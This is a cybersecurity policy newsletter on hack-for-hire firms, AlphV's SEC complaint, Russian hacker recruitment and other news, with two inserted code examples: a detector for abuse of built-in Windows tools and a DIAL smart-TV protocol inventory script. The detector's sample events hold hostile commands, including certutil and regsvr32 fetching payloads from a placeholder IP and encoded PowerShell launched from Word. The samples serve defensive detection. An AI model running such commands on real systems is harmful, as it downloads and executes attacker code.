
The Hack-for-Hire Industry: Death by a Thousand Cuts + When Theft Doesn't Work... Troll

Tom Uren
Friday, November 24, 2023, 10:00 AM
The latest edition of the Seriously Risky Business cybersecurity newsletter, now on Lawfare.

Published by The Lawfare Institute
in Cooperation With
Brookings

Editor’s Note: This newsletter is part of a collaboration between Lawfare and Risky Business. You can find the full version of the Seriously Risky Business newsletter and previous editions on Substack. This newsletter is edited for Lawfare by Eugenia Lostri.

Editor's Note: On Dec. 28, 2023, Lawfare received a letter notifying us that the Reuters story summarized in this article had been taken down pursuant to court order in response to allegations that it is false and defamatory. The letter demanded that we retract this post as well. The article in question has, indeed, been removed from the Reuters web site, replaced with a notice that "Reuters has temporarily removed the article 'How an Indian startup hacked the world' to comply with a preliminary court order issued on Dec. 4, 2023, in a district court in New Delhi, India. Reuters stands by its reporting and plans to appeal the decision." Neither Lawfare nor Seriously Risky Business takes any position on the merits of the litigation in India. But we have redacted material drawn from the Reuters article in question pending further developments in this matter.

The Hack-for-Hire Industry: Death by a Thousand Cuts

Reuters has published a report describing [XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

In a report last year Reuters revealed that email providers had provided access to a database of more than 80,000 emails sent by Indian hacking firms. [XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX XXXXX]

[XXXXX XXXXX] went on to be involved in BellTrox (aka Dark Basin), which Citizen Lab reported on back in 2020. BellTrox was at the centre of a Reuters investigation last year that showed how hack-for-hire firms were employed in an attempt to steal information that was used to influence litigation.

Citizen Lab's report describes the breadth of BellTrox's targeting:

Dark Basin has a remarkable portfolio of targets, from senior government officials and candidates in multiple countries, to financial services firms such as hedge funds and banks, to pharmaceutical companies. Troublingly, Dark Basin has extensively targeted American advocacy organisations working on domestic and global issues. These targets include climate advocacy organisations and net neutrality campaigners.

Meta examined CyberRoot, another Applin offshoot, in its report on the Surveillance-for-hire industry and found similarly voracious targeting:

Our investigation found CyberRoot target people around the world, working in a wide range of industries including cosmetic surgery and law firms in Australia, real-estate and investment companies in Russia, private equity firms and pharmaceutical companies in the US, environmental and anti-corruption activists in Angola, gambling entities in the UK, and mining companies in New Zealand. They were focused on business executives, lawyers, doctors, activists, journalists and members of the clergy in countries like Kazakhstan, Djibouti, Saudi Arabia, South Africa and Iceland. Our investigation corroborates the assessment by investigative journalists at Reuters that this group often targeted people involved in litigation, likely on behalf of law firms.

This feels a bit like a death by a thousand cuts. Each hack-for-hire incident exposed is troubling but is difficult to prosecute given the global nature of the industry and its use of private investigators and law firms as cutouts. But when summed up over time, the industry as a whole is a terrible scourge that undermines the rule of law by subverting legal processes.

If Data Theft Doesn't Work… Troll

The AlphV ransomware group has filed a US Securities and Exchange Commission (SEC) complaint against one of its victims for failing to disclose that it had been breached.

In the words of AlphV's submission, the victim company MeridianLink "failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules".

According to AlphV, the group breached MeridianLink on November 7 and stole files but did not encrypt company systems.

Quite apart from the submission being a ridiculous troll, there are a few pedantic problems with it. The SEC's four-business-day disclosure rule doesn't actually come into effect until the middle of December, and it only applies once a company has determined that an incident is material. MeridianLink told DataBreaches.net, "based on our investigation to date, we have identified no evidence of unauthorised access to our production platforms, and the incident has caused minimal business interruption". So it doesn't sound like a material incident anyway.

It also looks like AlphV missed a trick here: it doesn't appear to have applied to the SEC's whistleblower reward program. That scheme is designed to encourage whistleblowing by sharing a portion of the monetary sanctions from any resulting SEC enforcement action with the whistleblower. Applying would have been even more absurd, and potentially more effective, since this caper was all about using publicity to put extra pressure on MeridianLink.

However, cybersecurity professionals and companies should be aware that there could be a real opportunity here for ransomware groups to apply more pressure. The SEC's recent case against SolarWinds and its CISO alleges that the company's actual cyber security practices didn't match its public statements about them. Perhaps the opportunity for ransomware groups is to write penetration-test-style reports describing weaknesses in a victim's defences, contrast those findings with the victim's public statements (such as the boilerplate 'we take cyber security extremely seriously' etc.), and then threaten to send the report to the SEC.

Russia’s War for (Hacking) Talent

The Record has published an interview with Victor Zhora, the former deputy head of Ukraine's cyber security agency (the SSSCIP), discussing the evolving tactics of Russian cyber operations. (The day after the interview took place, Zhora was reportedly dismissed from the SSSCIP amid an embezzlement investigation.)

Most interestingly, Zhora commented on the difficulty Russia has recruiting cyber talent and said it is trying to build a talent pipeline from high schools and volunteer communities. Russia suffered a significant brain drain at the beginning of the invasion as skilled people left the country, and this has made it difficult for its cyber organisations to grow their capabilities.

He told The Record that, as a result, "they are putting focus on younger people because it's the only way for Russia to scale up and maintain the same intensity of cyberattacks".

Zhora also said that Russian groups were scouring Telegram channels, presumably ones in which patriotic Russian hacktivists organise their activities:

One way of engaging people to cyber offensive operations against Ukraine and our partners is seeking for talents in different Telegram channels where there’s always an officer of [the] FSB [Federal Security Service] or GRU [military intelligence] searching for the most skilled people and then inviting them to more official military structures.

There is already good evidence of coordination between Russian military intelligence and the country's hacktivist groups. However, it's difficult to trust unvetted groups of internet strangers with important cyber operations, so it makes sense to cherry-pick (and vet) talented individuals for more important work.

Zhora also recapped trends in Russian cyber operations that we've covered before. These include that Russian state groups remain focused on Ukrainian critical infrastructure and government organisations, but have shifted from disruptive operations to cyber espionage and data exfiltration. They've also shifted toward 'living off the land' approaches that rely on abusing legitimate tools that are already present in the host environment. 
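As an added illustration of why 'living off the land' is hard to spot (this is not from the interview or from the newsletter), the following Python snippet runs a handful of command-line based detection rules over constructed Windows process-creation events. The log format, hostnames, addresses, users and command lines are all made up for the example. The rules key on how a built-in tool is invoked rather than on the binary name alone, because the binaries themselves are legitimate and in constant administrative use; a hit is escalated when the parent process is an Office application.

```python
"""Flag 'living off the land' (LOTL) activity in process-creation telemetry.

Added example, not from the page. Events are constructed, pipe-separated lines:
    timestamp|host|user|parent_image|image|command_line
Rules match how a signed, built-in binary is invoked (download, scriptlet
execution, encoded commands, remote process creation), since matching on the
binary name alone would page on every admin who runs certutil.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    binary: str   # image file name, lower case, no path
    pattern: str  # case-insensitive regex over the command line


RULES = [
    Rule("certutil_download", "certutil.exe", r"-urlcache\b.*\bhttps?://|\s-decode\b"),
    Rule("regsvr32_scriptlet", "regsvr32.exe", r"/i:\s*https?://|\bscrobj\.dll\b"),
    Rule("mshta_remote", "mshta.exe", r"https?://|javascript:|vbscript:"),
    Rule("rundll32_script", "rundll32.exe", r"javascript:|vbscript:"),
    Rule("powershell_encoded", "powershell.exe",
         r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    Rule("wmic_process_create", "wmic.exe", r"\bprocess\s+call\s+create\b"),
    Rule("bitsadmin_transfer", "bitsadmin.exe", r"/transfer\b"),
    Rule("msiexec_remote", "msiexec.exe", r"/(?:i|package)\s+https?://"),
]

# A built-in tool spawned by an Office application is far more suspicious than
# the same tool spawned from a shell, so those hits are escalated.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def parse_event(line):
    """Split one constructed log line into its fields; image names are normalised."""
    ts, host, user, parent, image, cmdline = line.split("|", 5)
    return {
        "ts": ts, "host": host, "user": user,
        "parent": parent.rsplit("\\", 1)[-1].lower(),
        "image": image.rsplit("\\", 1)[-1].lower(),
        "cmdline": cmdline,
    }


def detect(event):
    """Return [(rule_name, severity)] for one parsed event."""
    hits = []
    for rule in RULES:
        if event["image"] == rule.binary and re.search(rule.pattern, event["cmdline"], re.I):
            severity = "high" if event["parent"] in OFFICE_PARENTS else "medium"
            hits.append((rule.name, severity))
    return hits


def scan(lines):
    """Run every rule over every event; return a flat list of alerts in log order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for name, severity in detect(ev):
            alerts.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                           "rule": name, "severity": severity, "cmdline": ev["cmdline"]})
    return alerts


# Constructed sample events (not real telemetry): two benign administrative
# uses of certutil/powershell sit alongside four abuses of built-in tools.
SAMPLE_EVENTS = [
    r"2023-11-20T09:14:02Z|ws-042|CORP\jdoe|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\Users\jdoe\AppData\Local\Temp\a.txt",
    r"2023-11-20T09:15:10Z|ws-042|CORP\jdoe|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify -urlfetch C:\certs\corp.cer",
    r"2023-11-20T09:16:31Z|ws-017|CORP\asmith|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    r"2023-11-20T09:17:05Z|ws-017|CORP\asmith|C:\Windows\System32\cmd.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /n /u /i:http://203.0.113.7/payload.sct scrobj.dll",
    r'2023-11-20T09:20:44Z|ws-017|CORP\asmith|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\wmic.exe|wmic.exe /node:fs01 process call create "cmd.exe /c whoami > C:\Windows\Temp\o.txt"',
    r"2023-11-20T09:25:00Z|srv-bk1|CORP\svc_backup|C:\Windows\System32\services.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f'{a["severity"]:6} {a["rule"]:22} {a["host"]} {a["user"]}: {a["cmdline"]}')
```

Run against the six constructed events, the rules raise four alerts (certutil download, encoded PowerShell from Word, regsvr32 scriptlet, remote wmic process creation) and stay quiet on the certificate check and the scheduled backup script. Real deployments tune these patterns per environment; the point is that the signal lives in arguments and parent-child relationships, not in the presence of the tool.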

Three Reasons to Be Cheerful This Week:

  1. US SIM swap requirements strengthened: The US Federal Communications Commission (FCC) has adopted new rules intended to protect US wireless telecommunications customers from SIM swap fraud. The new rules say wireless providers must use "secure methods of authenticating a customer", but don't specify what these secure methods are — it's up to providers to figure that out. The FCC writes "while the approach we take today gives wireless providers the flexibility to adapt to evolving threats, it also creates an obligation that they adapt to those threats". [Risky Business News has more coverage]
  2. Hack-for-hire intermediary sentenced: An Israeli private investigator, Aviram Azari, has been sentenced to 80 months in prison for organising global hacking campaigns. Prosecutors say Azari's clients paid him more than USD$4.8m over five years for organising the campaigns. Notable campaigns targeted individuals critical of now-defunct German payment processing company Wirecard and also climate activists who were campaigning against Exxon Mobil. One of the hack-for-hire firms Azari used was Indian firm BellTrox. 
  3. Binance pinged for USD$4.3bn: Binance, the world's largest cryptocurrency exchange, will pay USD$4.3bn to settle violations of US anti-money laundering law. Its CEO Changpeng Zhao (aka CZ) will also step down. We are calling this good news because the terms of the settlement will help clamp down on ransomware payments. The US Treasury Department said that Binance didn't report ransomware payments despite "transacting millions of dollars of ransomware proceeds involving at least 24 different strains of ransomware".

Shorts

Twitter's Flagging Flagging Efforts

Bloomberg analysed hundreds of viral posts on X, the website formerly known as Twitter, relating to the Israel/Hamas conflict and found that the site's efforts to address misinformation were not keeping up with the speed with which misleading posts were going viral. 

Since Elon Musk's takeover of Twitter he has dismantled much of the company's trust and safety function, so mechanisms it previously used to manage misinformation don't exist any more.

One recent innovation that attempts to address misinformation on the platform is 'Community Notes', a mechanism that gathers other X users' opinions to add context to posts and flag them as potentially misleading.

In theory, this could work because it harnesses users to address misinformation more broadly than a centralised Twitter team ever could. However, Bloomberg found that Community Notes correcting or adding context to posts typically appeared hours or even days after misleading posts had gone viral. Often these posts contained photos or videos that were repurposed from other conflicts (or even video games) and appear to be designed to be deliberately inflammatory.

Of course, Twitter's former role as a site to follow breaking news events is at odds with the slower pace that would come with the careful assessment of posts for misinformation.

How to Join the Active Defence Party

German digital technology think tank SNV (Stiftung Neue Verantwortung) has published a paper on how states should responsibly conduct 'Active Cyber Defence' operations. Its definition of active cyber defence is pretty broad and encompasses state action ranging from telling ISPs to block or sinkhole malicious traffic to what this newsletter calls 'offensive cyber operations' designed to disrupt cyber criminals, of the kind conducted by the UK's National Cyber Force.

Some states already carry out these kinds of operations and we expect that over time more states will take part. The paper is a sensible policy blueprint on how states can join the party.

I'm In Jail With a Broken Nose…

Now here's an AI-enabled scam that will work. In this video attorney Gary Schildhorn describes a scam which started with a phone call from his son saying that he'd been in a car accident in which he'd broken his nose and injured a pregnant woman.

The AI technology required is the ability to clone a voice, which could then be combined with a soundboard to trigger pre-prepared phrases. But this is a targeted attack that requires the scammers to do some homework beforehand. Firstly, the scammers need to identify individuals with enough speech available online such that their voice can be cloned. They then need to find relatives and contact details. But once they've done that we suspect their success rate will be pretty good.

Fortress Australia, Cyber Edition

The Australian government released its latest cyber security strategy this week and on the whole we approve.

The strategy uses a defence-in-depth framing with six 'cyber shields', ranging from "strong businesses and citizens" to "protected critical infrastructure". The third shield, "World-class threat sharing and blocking", is interesting. It takes a 'fortress Australia' approach and aims for whole-of-economy threat intelligence sharing, coupled with threat blocking at ISPs and telcos.

The strategy extends out to 2030, however, and there are not a lot of new funds given the extended time frame. A reasonable chunk of the new money is allocated to help Pacific countries both improve their cyber security and also to respond to crises.

Risky Biz Talks

You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (RSS, iTunes or Spotify). 

In our last "Between Two Nerds" discussion Tom Uren and The Grugq discuss how being more open about cyber security threats is great for marketing but has also forced cyber security companies to pick sides and make value judgements.

From Risky Biz News:

DIALStranger vulnerabilities disclosed after four years: Turkish security researcher Yunus Çadirci has discovered vulnerabilities in the DIAL (Discovery and Launch) protocol, along with misconfigurations in vendor equipment, that can be used to force TVs and other DIAL-capable devices to play an attacker's video content.

The DIALStranger flaws were discovered way back in 2019, but Çadirci kept the original report private for four years as the protocol received patches and vendors slowly updated devices.

[more on Risky Business News, including how the flaw could be used for "mass-rickrolling"]
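Added example, not from the newsletter and not from Çadirci's research (which the page does not detail): a small Python walkthrough of the DIAL exchange, useful for inventorying DIAL-capable devices on a network segment. The message formats follow the public DIAL specification: discovery is an SSDP M-SEARCH for the DIAL search target, the SSDP reply's LOCATION points at a device description whose HTTP response carries an Application-URL header, and a GET of <Application-URL>/<app> returns that app's state. Every device reply here is constructed so the code runs offline; the 192.0.2.25 address and the UUID are placeholders.

```python
"""Walk through the DIAL (Discovery and Launch) exchange used by smart TVs.

Added example; not from the page or from the DIALStranger research. Message
formats follow the public DIAL specification. Every device reply below is
constructed so the walkthrough runs offline; 192.0.2.25 and the UUID are
placeholders, not real devices.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900
DIAL_ST = "urn:dial-multiscreen-org:service:dial:1"
DIAL_NS = "{urn:dial-multiscreen-org:schemas:dial}"


def build_msearch(mx=2):
    """SSDP M-SEARCH asking every DIAL server on the segment to reply within mx seconds."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {SSDP_ADDR}:{SSDP_PORT}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {DIAL_ST}\r\n"
        "\r\n"
    )


def parse_http_head(raw):
    """Split an HTTP-style message into (start line, header dict with lower-cased names)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def ssdp_location(raw_reply):
    """Device-description URL from an SSDP reply, or None if it is not a DIAL server."""
    status, h = parse_http_head(raw_reply)
    if not status.startswith("HTTP/1.1 200") or h.get("st") != DIAL_ST:
        return None
    return h.get("location")


def application_url(device_desc_reply):
    """DIAL advertises the app base URL in an Application-URL header of the
    device-description response, not in the UPnP XML body."""
    _, h = parse_http_head(device_desc_reply)
    url = h.get("application-url")
    if url is None:
        return None
    return url if url.endswith("/") else url + "/"


def build_app_state_request(app_url, app_name):
    """GET <Application-URL>/<app>: read-only, reports whether the app is installed/running."""
    p = urlparse(app_url)
    return f"GET {p.path}{app_name} HTTP/1.1\r\nHOST: {p.hostname}:{p.port or 80}\r\n\r\n"


def parse_app_state(xml_body):
    """Pull name, state and allowStop out of a DIAL app-state document."""
    root = ET.fromstring(xml_body)
    opts = root.find(f"{DIAL_NS}options")
    return {
        "name": root.findtext(f"{DIAL_NS}name"),
        "state": root.findtext(f"{DIAL_NS}state"),
        "allow_stop": opts is not None and opts.get("allowStop") == "true",
    }


def inventory(ssdp_reply, device_desc_reply, app_state_xml, app_name="YouTube"):
    """Tie the three steps together for one device; None if the SSDP reply is not DIAL."""
    location = ssdp_location(ssdp_reply)
    if location is None:
        return None
    app_url = application_url(device_desc_reply)
    return {"location": location, "app_url": app_url,
            "state_request": build_app_state_request(app_url, app_name),
            app_name: parse_app_state(app_state_xml)}


# --- constructed device replies (not captured from real hardware) ---
SSDP_REPLY = (
    "HTTP/1.1 200 OK\r\n"
    "CACHE-CONTROL: max-age=1800\r\n"
    "EXT:\r\n"
    "LOCATION: http://192.0.2.25:8008/ssdp/device-desc.xml\r\n"
    f"ST: {DIAL_ST}\r\n"
    f"USN: uuid:0f0a1d3e-2b3c-4d5e-8f90-abcdef123456::{DIAL_ST}\r\n"
    "\r\n"
)
DEVICE_DESC_REPLY = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/xml\r\n"
    "Application-URL: http://192.0.2.25:8008/apps\r\n"
    "\r\n"
    '<root xmlns="urn:schemas-upnp-org:device-1-0"><device>'
    "<friendlyName>Living room TV</friendlyName></device></root>"
)
APP_STATE_XML = (
    '<service xmlns="urn:dial-multiscreen-org:schemas:dial" dialVer="1.7">'
    '<name>YouTube</name><options allowStop="true"/><state>stopped</state>'
    "</service>"
)

if __name__ == "__main__":
    print(build_msearch(), end="")
    print(inventory(SSDP_REPLY, DEVICE_DESC_REPLY, APP_STATE_XML))
```

Launching an app is a POST to the same per-app URL, and the base specification puts no authentication in front of it, so whatever the specific DIALStranger findings are, the practical question for a defender is which networks can reach a device's Application-URL at all. To use this on a live segment, send build_msearch() over UDP to 239.255.255.250:1900, feed each reply to ssdp_location(), fetch the device description over HTTP and pass the raw response to application_url().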

NTMC leak: Bangladesh intelligence agency NTMC has left a sensitive database exposed on the internet and leaked the personal details of an unknown number of citizens. The leaked data contained more than 120 data points for each citizen, ranging from real names to Twitter IDs, criminal records, and phone call records. Discovered by Viktor Markopoulos of CloudDefense.AI, the researcher says he reported the database to Bangladesh officials, but the server was never secured. Instead, it was wiped and replaced with a ransom demand, presumably in an automated attack. [Additional coverage in Wired]

Tor Project removes 1k relays linked to cryptocurrency scheme: The Tor Project has removed an estimated 1,000 relay servers from its network, citing their involvement with a for-profit cryptocurrency scheme.

The scheme allegedly promised cryptocurrency tokens for users who set up and ran Tor relays.

In a blog post on Monday, Tor admins said they removed participating servers to protect the integrity and reputation of their project. The removal was subject to a community vote that passed last week.

[more on Risky Business News, including Tor's funding sources]


Tom Uren writes Seriously Risky Business, a big-picture, policy-focused cyber security newsletter. He also co-hosts the Seriously Risky Business and Between Two Nerds podcasts that appear on the Risky Business News feed. He was formerly a Senior Analyst in the Australian Strategic Policy Institute's (ASPI) Cyber Policy Centre where he contributed to various projects including on offensive cyber capabilities, information operations, the Huawei debate in Australia and end-to-end encryption.
